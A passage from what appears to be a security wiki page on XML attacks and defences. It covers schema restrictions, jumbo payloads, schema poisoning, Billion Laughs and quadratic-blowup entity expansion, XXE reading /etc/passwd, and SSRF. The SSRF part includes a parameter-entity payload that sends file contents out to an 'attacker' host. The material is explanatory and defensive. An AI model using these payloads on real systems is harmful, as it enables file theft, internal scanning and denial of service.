  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
